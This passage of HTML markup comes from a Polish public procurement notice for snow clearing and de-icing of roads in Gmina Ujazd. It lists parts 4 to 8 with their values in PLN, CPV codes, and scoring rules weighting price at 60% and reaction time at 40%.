<h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 7862,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15163,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41277,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 100440,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium:<br/>1) Wartość brutto– znaczenie 60%;<br/>2) Czas reakcji -znaczenie 40%.<br/>Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin x 100 x waga) / Cof<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>Czas reakcji [h]<br/>Wykonawca zobowiązany będzie wskazać czas w jakim przystąpi do rozpoczęcia odśnieżania i<br/>usuwania śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora,<br/>przyznawanie punktów poszczególnym ofertom w/w kryterium odbywać się będzie wg następującej<br/>zasady:<br/>w ciągu 1 godziny zegarowej- uzyska 40pkt;<br/>w ciągu 1,5 godziny zegarowej- uzyska 30pkt;<br/>w ciągu 2 godzin zegarowych- uzyska 20pkt;<br/>w ciągu 2,5 godzin zegarowych- uzyska 10pkt;<br/>w ciągu 3 godzin zegarowych- uzyska 0pkt;<br/>Wykonawca może uzyskać maksymalnie 40 pkt, kryterium będzie oceniane na podstawie<br/>oświadczenia złożonego w treści Formularza ofertowego w ramach każdego zadania oddzielnie.<br/>Wykonawca obowiązkowo musi wskazać tylko jeden przedział każdorazowego rozpoczęcia realizacji<br/>przedmiotu zamówienia:<br/>a) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, poniżej 1<br/>godziny zegarowej jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.<br/>b) Oferta Wykonawcy, który wskaże czas w jakim przystąpi do rozpoczęcia odśnieżania i usuwania<br/>śliskości zimowej, liczony od momentu otrzymania zlecenia wyjazdu od Koordynatora, powyżej 3<br/>godzin zegarowych jego oferta zostanie odrzucona, jako oferta niezgodna z warunkami zamówienia w<br/>ramach zadania na które zaoferował omawiany czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace polegające na zimowym utrzymaniu dróg na terenie Gminy<br/>Ujazd, zarówno w dni robocze jak też w dni wolne od pracy. Utrzymanie zimowe dróg na terenie<br/>Gminy Ujazd obejmuje usuwanie skutków zimy zmierzających do zwiększenia bezpieczeństwa<br/>ruchu w tym:<br/>1. Odśnieżanie z całej szerokości ulic, dróg asfaltowych, zatok autobusowych i utrzymaniem<br/>stałej przejezdności;<br/>2. Usuwanie śliskości zimowej przy zastosowaniu odpowiednich środków powodujących<br/>szorstkość nawierzchni;<br/>3. Posypanie solą po odgarnięciu śniegu i lodu;<br/>W ramach niniejszego zamówienia wykonawca zobowiązany jest do:<br/>1. Odśnieżania dróg (dróg publicznych oraz wewnętrznych, ulic, zatok autobusowych) na terenie<br/>Gminy Ujazd;<br/>2. Zapobiegania powstawaniu oraz usuwania śliskości przez stosowanie środków<br/>zwiększających przyczepność poprzez poprawę tarcia (sól);<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>3. Wywożenia śniegu w miejsce wskazane przez zamawiającego (w przypadku obfitych<br/>opadów);<br/>4. Zapewnienie całodobowego dyżuru gotowości sprzętu oraz bieżącej kontroli stanu dróg w<br/>ramach „Akcji Zima”<br/>5. Zapewnienie całodobowej stałej łączności telefonicznej z Zamawiającym dla przyjmowania<br/>zgłoszeń od pracownika Zamawiającego –zlecenie potwierdzone SMS lub e-mail oraz<br/>zgłaszanie pracownikowi Zamawiającego sytuacji na drogach;<br/>6. Przy intensywnych, długotrwałych opadach śniegu, silnych wiatrach powodujących powstanie<br/>zawiei i zamieci śnieżnych, należy koncentrować działalność na zapewnieniu przejezdności dróg<br/>o największym znaczeniu komunikacyjnym </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31806,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 